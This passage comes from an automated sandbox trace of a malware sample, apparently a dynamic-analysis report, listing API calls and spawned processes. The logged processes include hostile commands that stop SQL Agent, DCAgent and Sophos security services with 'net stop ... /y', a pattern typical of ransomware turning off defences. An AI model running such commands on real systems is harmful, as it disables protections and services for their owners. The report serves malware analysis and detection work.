_String2="SQLAgent$TPS") returned -7 [0048.363] _wcsicmp (_String1="alerter", _String2="SQLAgent$TPS") returned -18 [0048.363] _wcsicmp (_String1="netlogon", _String2="SQLAgent$TPS") returned -5 [0048.363] _wcsupr (in: _String="SQLAgent$TPS" | out: _String="SQLAGENT$TPS") returned="SQLAGENT$TPS" [0048.363] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x7154d0 [0048.366] GetServiceKeyNameW (in: hSCManager=0x7154d0, lpDisplayName="SQLAGENT$TPS", lpServiceName=0xacaaf0, lpcchBuffer=0x35fb84 | out: lpServiceName="", lpcchBuffer=0x35fb84) returned 0 [0048.366] _wcsicmp (_String1="msg", _String2="SQLAGENT$TPS") returned -6 [0048.366] _wcsicmp (_String1="messenger", _String2="SQLAGENT$TPS") returned -6 [0048.367] _wcsicmp (_String1="receiver", _String2="SQLAGENT$TPS") returned -1 [0048.367] _wcsicmp (_String1="rcv", _String2="SQLAGENT$TPS") returned -1 [0048.367] _wcsicmp (_String1="redirector", _String2="SQLAGENT$TPS") returned -1 [0048.367] _wcsicmp (_String1="redir", _String2="SQLAGENT$TPS") returned -1 [0048.367] _wcsicmp (_String1="rdr", _String2="SQLAGENT$TPS") returned -1 [0048.367] _wcsicmp (_String1="workstation", _String2="SQLAGENT$TPS") returned 4 [0048.367] _wcsicmp (_String1="work", _String2="SQLAGENT$TPS") returned 4 [0048.367] _wcsicmp (_String1="wksta", _String2="SQLAGENT$TPS") returned 4 [0048.367] _wcsicmp (_String1="prdr", _String2="SQLAGENT$TPS") returned -3 [0048.367] _wcsicmp (_String1="devrdr", _String2="SQLAGENT$TPS") returned -15 [0048.367] _wcsicmp (_String1="lanmanworkstation", _String2="SQLAGENT$TPS") returned -7 [0048.367] _wcsicmp (_String1="server", _String2="SQLAGENT$TPS") returned -12 [0048.367] _wcsicmp (_String1="svr", _String2="SQLAGENT$TPS") returned 5 [0048.367] _wcsicmp (_String1="srv", _String2="SQLAGENT$TPS") returned 1 [0048.367] _wcsicmp (_String1="lanmanserver", _String2="SQLAGENT$TPS") returned -7 [0048.367] _wcsicmp (_String1="alerter", _String2="SQLAGENT$TPS") returned -18 [0048.367] _wcsicmp (_String1="netlogon", _String2="SQLAGENT$TPS") returned -5 [0048.367] NetServiceControl (in: servername=0x0, service="SQLAGENT$TPS", opcode=0x0, arg=0x0, bufptr=0x35fb80 | out: bufptr=0x35fb80) returned 0x889 [0048.368] wcscpy_s (in: _Destination=0xaca4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0048.368] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73ce0000 [0048.373] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73ce0000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0xacb338, nSize=0x800, Arguments=0xac9dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0048.375] GetFileType (hFile=0x26c) returned 0x3 [0048.375] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x714000 [0048.375] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x714000, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0048.375] WriteFile (in: hFile=0x26c, lpBuffer=0x714000*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x35fac0, lpOverlapped=0x0 | out: lpBuffer=0x714000*, lpNumberOfBytesWritten=0x35fac0*=0x1e, lpOverlapped=0x0) returned 1 [0048.375] LocalFree (hMem=0x714000) returned 0x0 [0048.375] GetFileType (hFile=0x26c) returned 0x3 [0048.375] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7162a8 [0048.375] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7162a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nq", lpUsedDefaultChar=0x0) returned 2 [0048.375] WriteFile (in: hFile=0x26c, lpBuffer=0x7162a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35fac0, lpOverlapped=0x0 | out: lpBuffer=0x7162a8*, lpNumberOfBytesWritten=0x35fac0*=0x2, lpOverlapped=0x0) returned 1 [0048.375] LocalFree (hMem=0x7162a8) returned 0x0 [0048.375] _ultow (in: _Dest=0x889, _Radix=3537648 | out: _Dest=0x889) returned="2185" [0048.375] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73ce0000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0xacb338, nSize=0x800, Arguments=0xac9dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0048.375] GetFileType (hFile=0x26c) returned 0x3 [0048.375] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x7162a8 [0048.375] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x7162a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0048.376] WriteFile (in: hFile=0x26c, lpBuffer=0x7162a8*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x35facc, lpOverlapped=0x0 | out: lpBuffer=0x7162a8*, lpNumberOfBytesWritten=0x35facc*=0x34, lpOverlapped=0x0) returned 1 [0048.376] LocalFree (hMem=0x7162a8) returned 0x0 [0048.376] GetFileType (hFile=0x26c) returned 0x3 [0048.376] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x7162a8 [0048.376] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x7162a8, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\nq", lpUsedDefaultChar=0x0) returned 2 [0048.376] WriteFile (in: hFile=0x26c, lpBuffer=0x7162a8*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x35facc, lpOverlapped=0x0 | out: lpBuffer=0x7162a8*, lpNumberOfBytesWritten=0x35facc*=0x2, lpOverlapped=0x0) returned 1 [0048.376] LocalFree (hMem=0x7162a8) returned 0x0 [0048.376] NetApiBufferFree (Buffer=0x711c70) returned 0x0 [0048.376] NetApiBufferFree (Buffer=0x711c88) returned 0x0 [0048.376] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop SQLAgent$TPS /y" [0048.376] exit (_Code=2) Process: id = "108" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x230f4000" os_pid = "0x36c" os_integrity_level = "0x4000" os_privileges = "0xe60b1e890" monitor_reason = "rpc_server" parent_id = "95" os_parent_pid = "0x964" cmd_line = "C:\\Windows\\system32\\svchost.exe -k netsvcs" cur_dir = "C:\\Windows\\system32\\" os_username = "NT AUTHORITY\\SYSTEM" bitness = "64" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xa], "NT SERVICE\\LanmanServer" [0xa], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xa], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xa], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xa], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xa], "NT SERVICE\\wuauserv" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000cedf" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe] Thread: id = 180 os_tid = 0x790 Thread: id = 181 os_tid = 0x798 Thread: id = 182 os_tid = 0x7f8 Thread: id = 183 os_tid = 0x430 Thread: id = 184 os_tid = 0x268 Thread: id = 185 os_tid = 0x768 Thread: id = 186 os_tid = 0x764 Thread: id = 187 os_tid = 0x760 Thread: id = 188 os_tid = 0x75c Thread: id = 189 os_tid = 0x70c Thread: id = 190 os_tid = 0x6e8 Thread: id = 191 os_tid = 0x6d8 Thread: id = 192 os_tid = 0x6d4 Thread: id = 193 os_tid = 0x6c8 Thread: id = 194 os_tid = 0x6c0 Thread: id = 195 os_tid = 0x6b8 Thread: id = 196 os_tid = 0x6a4 Thread: id = 197 os_tid = 0x6a0 Thread: id = 198 os_tid = 0x690 Thread: id = 199 os_tid = 0x67c Thread: id = 200 os_tid = 0x490 Thread: id = 201 os_tid = 0x454 Thread: id = 202 os_tid = 0x450 Thread: id = 203 os_tid = 0x428 Thread: id = 204 os_tid = 0x424 Thread: id = 205 os_tid = 0x420 Thread: id = 206 os_tid = 0x404 Thread: id = 207 os_tid = 0x18c Thread: id = 208 os_tid = 0xf0 Thread: id = 209 os_tid = 0xc8 Thread: id = 210 os_tid = 0x3f0 Thread: id = 211 os_tid = 0x3e4 Thread: id = 212 os_tid = 0x398 Thread: id = 213 os_tid = 0x394 Thread: id = 214 os_tid = 0x390 Thread: id = 215 os_tid = 0x38c Thread: id = 216 os_tid = 0x378 Thread: id = 217 os_tid = 0x370 Thread: id = 220 os_tid = 0xa20 Thread: id = 223 os_tid = 0xa48 Thread: id = 224 os_tid = 0xa4c Thread: id = 225 os_tid = 0xa40 Thread: id = 226 os_tid = 0xa44 Thread: id = 227 os_tid = 0xa3c Thread: id = 239 os_tid = 0xaa4 Thread: id = 240 os_tid = 0xa9c Thread: id = 241 os_tid = 0xaa0 Thread: id = 242 os_tid = 0xa94 Thread: id = 243 os_tid = 0xa98 Thread: id = 244 os_tid = 0xa90 Thread: id = 246 os_tid = 0xab8 Thread: id = 247 os_tid = 0xabc Thread: id = 250 os_tid = 0xb20 Thread: id = 257 os_tid = 0xbc4 Thread: id = 258 os_tid = 0xbe0 Thread: id = 259 os_tid = 0xbd8 Thread: id = 260 os_tid = 0xbd4 Thread: id = 261 os_tid = 0xbf0 Thread: id = 262 os_tid = 0xbe8 Thread: id = 263 os_tid = 0x5a8 Thread: id = 271 os_tid = 0x570 Thread: id = 272 os_tid = 0x5b0 Thread: id = 275 os_tid = 0x288 Thread: id = 281 os_tid = 0x78c Thread: id = 282 os_tid = 0xbe0 Thread: id = 283 os_tid = 0xbc4 Thread: id = 290 os_tid = 0x870 Thread: id = 291 os_tid = 0x894 Thread: id = 292 os_tid = 0x838 Thread: id = 532 os_tid = 0x7a4 Thread: id = 568 os_tid = 0x8f4 Thread: id = 569 os_tid = 0xa3c Thread: id = 570 os_tid = 0x4a0 Thread: id = 571 os_tid = 0x228 Thread: id = 591 os_tid = 0x720 Thread: id = 592 os_tid = 0x580 Thread: id = 593 os_tid = 0x82c Thread: id = 594 os_tid = 0xc8 Thread: id = 595 os_tid = 0x578 Thread: id = 598 os_tid = 0xa64 Process: id = "109" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x456e1000" os_pid = "0x8bc" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop DCAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 218 os_tid = 0xa34 Process: id = "110" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x450b3000" os_pid = "0xa2c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "109" os_parent_pid = "0x8bc" cmd_line = "C:\\Windows\\system32\\net1 stop DCAgent /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 219 os_tid = 0xa30 [0049.889] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x1cf81c | out: lpSystemTimeAsFileTime=0x1cf81c*(dwLowDateTime=0xe7124c00, dwHighDateTime=0x1d57a86)) [0049.889] GetCurrentProcessId () returned 0xa2c [0049.889] GetCurrentThreadId () returned 0xa30 [0049.889] GetTickCount () returned 0x11470ec [0049.889] QueryPerformanceCounter (in: lpPerformanceCount=0x1cf814 | out: lpPerformanceCount=0x1cf814*=17017412980) returned 1 [0049.890] GetModuleHandleA (lpModuleName=0x0) returned 0x560000 [0049.890] __set_app_type (_Type=0x1) [0049.890] __p__fmode () returned 0x74eb31f4 [0049.890] __p__commode () returned 0x74eb31fc [0049.890] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x56ffe6) returned 0x0 [0049.890] __getmainargs (in: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068, _DoWildCard=0, _StartInfo=0x579024 | out: _Argc=0x579064, _Argv=0x57906c, _Env=0x579068) returned 0 [0049.890] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0049.890] GetConsoleOutputCP () returned 0x1b5 [0049.890] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x579080 | out: lpCPInfo=0x579080) returned 1 [0049.890] SetThreadUILanguage (LangId=0x0) returned 0x409 [0049.894] sprintf_s (in: _DstBuf=0x1cf7d4, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0049.894] setlocale (category=0, locale=".437") returned="English_United States.437" [0049.896] GetStdHandle (nStdHandle=0xfffffff5) returned 0x264 [0049.896] GetStdHandle (nStdHandle=0xfffffff4) returned 0x26c [0049.896] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DCAgent /y" [0049.896] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x1cf5a0, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0049.896] RtlAllocateHeap (HeapHandle=0x3d0000, Flags=0x0, Size=0x62) returned 0x3e3c00 [0049.896] _wcsnicmp (_String1="/Y", _String2="/y", _MaxCount=0x2) returned 0 [0049.896] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf7a4 | out: Buffer=0x1cf7a4*=0x3e1c60) returned 0x0 [0049.896] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x1cf7a4 | out: Buffer=0x1cf7a4*=0x3e1c78) returned 0x0 [0049.896] _fileno (_File=0x74eb2900) returned -2 [0049.896] _setmode (_FileHandle=-2, _Mode=16384) returned -1 [0049.896] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0049.896] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0049.896] _wcsicmp (_String1="config", _String2="stop") returned -16 [0049.896] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0049.896] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0049.896] _wcsicmp (_String1="file", _String2="stop") returned -13 [0049.896] _wcsicmp (_String1="files", _String2="stop") returned -13 [0049.896] _wcsicmp (_String1="group", _String2="stop") returned -12 [0049.896] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0049.897] _wcsicmp (_String1="help", _String2="stop") returned -11 [0049.897] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0049.897] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0049.897] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0049.897] _wcsicmp (_String1="session", _String2="stop") returned -15 [0049.897] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0049.897] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0049.897] _wcsicmp (_String1="share", _String2="stop") returned -12 [0049.897] _wcsicmp (_String1="start", _String2="stop") returned -14 [0049.897] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0049.897] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0049.897] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0049.897] _wcsicmp (_String1="accounts", _String2="DCAgent") returned -3 [0049.897] _wcsicmp (_String1="computer", _String2="DCAgent") returned -1 [0049.897] _wcsicmp (_String1="config", _String2="DCAgent") returned -1 [0049.897] _wcsicmp (_String1="continue", _String2="DCAgent") returned -1 [0049.897] _wcsicmp (_String1="cont", _String2="DCAgent") returned -1 [0049.897] _wcsicmp (_String1="file", _String2="DCAgent") returned 2 [0049.897] _wcsicmp (_String1="files", _String2="DCAgent") returned 2 [0049.897] _wcsicmp (_String1="group", _String2="DCAgent") returned 3 [0049.897] _wcsicmp (_String1="groups", _String2="DCAgent") returned 3 [0049.897] _wcsicmp (_String1="help", _String2="DCAgent") returned 4 [0049.897] _wcsicmp (_String1="helpmsg", _String2="DCAgent") returned 4 [0049.897] _wcsicmp (_String1="localgroup", _String2="DCAgent") returned 8 [0049.897] _wcsicmp (_String1="pause", _String2="DCAgent") returned 12 [0049.897] _wcsicmp (_String1="session", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="sessions", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="sess", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="share", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="start", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="stats", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="statistics", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="stop", _String2="DCAgent") returned 15 [0049.897] _wcsicmp (_String1="time", _String2="DCAgent") returned 16 [0049.897] _wcsicmp (_String1="user", _String2="DCAgent") returned 17 [0049.897] _wcsicmp (_String1="users", _String2="DCAgent") returned 17 [0049.897] _wcsicmp (_String1="msg", _String2="DCAgent") returned 9 [0049.898] _wcsicmp (_String1="messenger", _String2="DCAgent") returned 9 [0049.898] _wcsicmp (_String1="receiver", _String2="DCAgent") returned 14 [0049.898] _wcsicmp (_String1="rcv", _String2="DCAgent") returned 14 [0049.898] _wcsicmp (_String1="netpopup", _String2="DCAgent") returned 10 [0049.898] _wcsicmp (_String1="redirector", _String2="DCAgent") returned 14 [0049.898] _wcsicmp (_String1="redir", _String2="DCAgent") returned 14 [0049.898] _wcsicmp (_String1="rdr", _String2="DCAgent") returned 14 [0049.898] _wcsicmp (_String1="workstation", _String2="DCAgent") returned 19 [0049.898] _wcsicmp (_String1="work", _String2="DCAgent") returned 19 [0049.898] _wcsicmp (_String1="wksta", _String2="DCAgent") returned 19 [0049.898] _wcsicmp (_String1="prdr", _String2="DCAgent") returned 12 [0049.898] _wcsicmp (_String1="devrdr", _String2="DCAgent") returned 2 [0049.898] _wcsicmp (_String1="lanmanworkstation", _String2="DCAgent") returned 8 [0049.898] _wcsicmp (_String1="server", _String2="DCAgent") returned 15 [0049.898] _wcsicmp (_String1="svr", _String2="DCAgent") returned 15 [0049.898] _wcsicmp (_String1="srv", _String2="DCAgent") returned 15 [0049.898] _wcsicmp (_String1="lanmanserver", _String2="DCAgent") returned 8 [0049.898] _wcsicmp (_String1="alerter", _String2="DCAgent") returned -3 [0049.898] _wcsicmp (_String1="netlogon", _String2="DCAgent") returned 10 [0049.898] _wcsupr (in: _String="DCAgent" | out: _String="DCAGENT") returned="DCAGENT" [0049.898] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x80000000) returned 0x3e54b8 [0049.901] GetServiceKeyNameW (in: hSCManager=0x3e54b8, lpDisplayName="DCAGENT", lpServiceName=0x57aaf0, lpcchBuffer=0x1cf740 | out: lpServiceName="", lpcchBuffer=0x1cf740) returned 0 [0049.902] _wcsicmp (_String1="msg", _String2="DCAGENT") returned 9 [0049.902] _wcsicmp (_String1="messenger", _String2="DCAGENT") returned 9 [0049.902] _wcsicmp (_String1="receiver", _String2="DCAGENT") returned 14 [0049.902] _wcsicmp (_String1="rcv", _String2="DCAGENT") returned 14 [0049.902] _wcsicmp (_String1="redirector", _String2="DCAGENT") returned 14 [0049.902] _wcsicmp (_String1="redir", _String2="DCAGENT") returned 14 [0049.902] _wcsicmp (_String1="rdr", _String2="DCAGENT") returned 14 [0049.902] _wcsicmp (_String1="workstation", _String2="DCAGENT") returned 19 [0049.902] _wcsicmp (_String1="work", _String2="DCAGENT") returned 19 [0049.902] _wcsicmp (_String1="wksta", _String2="DCAGENT") returned 19 [0049.902] _wcsicmp (_String1="prdr", _String2="DCAGENT") returned 12 [0049.902] _wcsicmp (_String1="devrdr", _String2="DCAGENT") returned 2 [0049.902] _wcsicmp (_String1="lanmanworkstation", _String2="DCAGENT") returned 8 [0049.902] _wcsicmp (_String1="server", _String2="DCAGENT") returned 15 [0049.902] _wcsicmp (_String1="svr", _String2="DCAGENT") returned 15 [0049.902] _wcsicmp (_String1="srv", _String2="DCAGENT") returned 15 [0049.902] _wcsicmp (_String1="lanmanserver", _String2="DCAGENT") returned 8 [0049.902] _wcsicmp (_String1="alerter", _String2="DCAGENT") returned -3 [0049.902] _wcsicmp (_String1="netlogon", _String2="DCAGENT") returned 10 [0049.902] NetServiceControl (in: servername=0x0, service="DCAGENT", opcode=0x0, arg=0x0, bufptr=0x1cf73c | out: bufptr=0x1cf73c) returned 0x889 [0049.903] wcscpy_s (in: _Destination=0x57a4e8, _SizeInWords=0x104, _Source="NETMSG" | out: _Destination="NETMSG") returned 0x0 [0049.903] LoadLibraryW (lpLibFileName="NETMSG") returned 0x73c40000 [0049.904] FormatMessageW (in: dwFlags=0x2a00, lpSource=0x73c40000, dwMessageId=0x889, dwLanguageId=0x0, lpBuffer=0x57b338, nSize=0x800, Arguments=0x579dd8 | out: lpBuffer="The service name is invalid.\r\n") returned 0x1e [0049.905] GetFileType (hFile=0x26c) returned 0x3 [0049.905] LocalAlloc (uFlags=0x0, uBytes=0x3c) returned 0x3e3fe8 [0049.905] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="The service name is invalid.\r\n", cchWideChar=30, lpMultiByteStr=0x3e3fe8, cbMultiByte=60, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="The service name is invalid.\r\n", lpUsedDefaultChar=0x0) returned 30 [0049.905] WriteFile (in: hFile=0x26c, lpBuffer=0x3e3fe8*, nNumberOfBytesToWrite=0x1e, lpNumberOfBytesWritten=0x1cf67c, lpOverlapped=0x0 | out: lpBuffer=0x3e3fe8*, lpNumberOfBytesWritten=0x1cf67c*=0x1e, lpOverlapped=0x0) returned 1 [0049.905] LocalFree (hMem=0x3e3fe8) returned 0x0 [0049.905] GetFileType (hFile=0x26c) returned 0x3 [0049.905] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e6290 [0049.905] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0049.905] WriteFile (in: hFile=0x26c, lpBuffer=0x3e6290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf67c, lpOverlapped=0x0 | out: lpBuffer=0x3e6290*, lpNumberOfBytesWritten=0x1cf67c*=0x2, lpOverlapped=0x0) returned 1 [0049.905] LocalFree (hMem=0x3e6290) returned 0x0 [0049.905] _ultow (in: _Dest=0x889, _Radix=1898156 | out: _Dest=0x889) returned="2185" [0049.905] FormatMessageW (in: dwFlags=0x2800, lpSource=0x73c40000, dwMessageId=0xdba, dwLanguageId=0x0, lpBuffer=0x57b338, nSize=0x800, Arguments=0x579dd8 | out: lpBuffer="More help is available by typing NET HELPMSG 2185.\r\n") returned 0x34 [0049.905] GetFileType (hFile=0x26c) returned 0x3 [0049.905] LocalAlloc (uFlags=0x0, uBytes=0x68) returned 0x3e6290 [0049.905] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="More help is available by typing NET HELPMSG 2185.\r\n", cchWideChar=52, lpMultiByteStr=0x3e6290, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="More help is available by typing NET HELPMSG 2185.\r\n\x04", lpUsedDefaultChar=0x0) returned 52 [0049.905] WriteFile (in: hFile=0x26c, lpBuffer=0x3e6290*, nNumberOfBytesToWrite=0x34, lpNumberOfBytesWritten=0x1cf688, lpOverlapped=0x0 | out: lpBuffer=0x3e6290*, lpNumberOfBytesWritten=0x1cf688*=0x34, lpOverlapped=0x0) returned 1 [0049.905] LocalFree (hMem=0x3e6290) returned 0x0 [0049.905] GetFileType (hFile=0x26c) returned 0x3 [0049.906] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x3e6290 [0049.906] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=2, lpMultiByteStr=0x3e6290, cbMultiByte=4, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n>", lpUsedDefaultChar=0x0) returned 2 [0049.906] WriteFile (in: hFile=0x26c, lpBuffer=0x3e6290*, nNumberOfBytesToWrite=0x2, lpNumberOfBytesWritten=0x1cf688, lpOverlapped=0x0 | out: lpBuffer=0x3e6290*, lpNumberOfBytesWritten=0x1cf688*=0x2, lpOverlapped=0x0) returned 1 [0049.906] LocalFree (hMem=0x3e6290) returned 0x0 [0049.906] NetApiBufferFree (Buffer=0x3e1c60) returned 0x0 [0049.906] NetApiBufferFree (Buffer=0x3e1c78) returned 0x0 [0049.906] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop DCAgent /y" [0049.906] exit (_Code=2) Process: id = "111" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x461e6000" os_pid = "0xa28" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "2" os_parent_pid = "0x908" cmd_line = "net stop ΓÇ£Sophos Message RouterΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 221 os_tid = 0xa1c Process: id = "112" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x465a3000" os_pid = "0xa18" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "111" os_parent_pid = "0xa28" cmd_line = "C:\\Windows\\system32\\net1 stop ΓÇ£Sophos Message RouterΓÇ¥ /y" cur_dir = "C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e9ce" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 222 os_tid = 0xa50 [0050.146] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffda8 | out: lpSystemTimeAsFileTime=0x2ffda8*(dwLowDateTime=0xe73ac360, 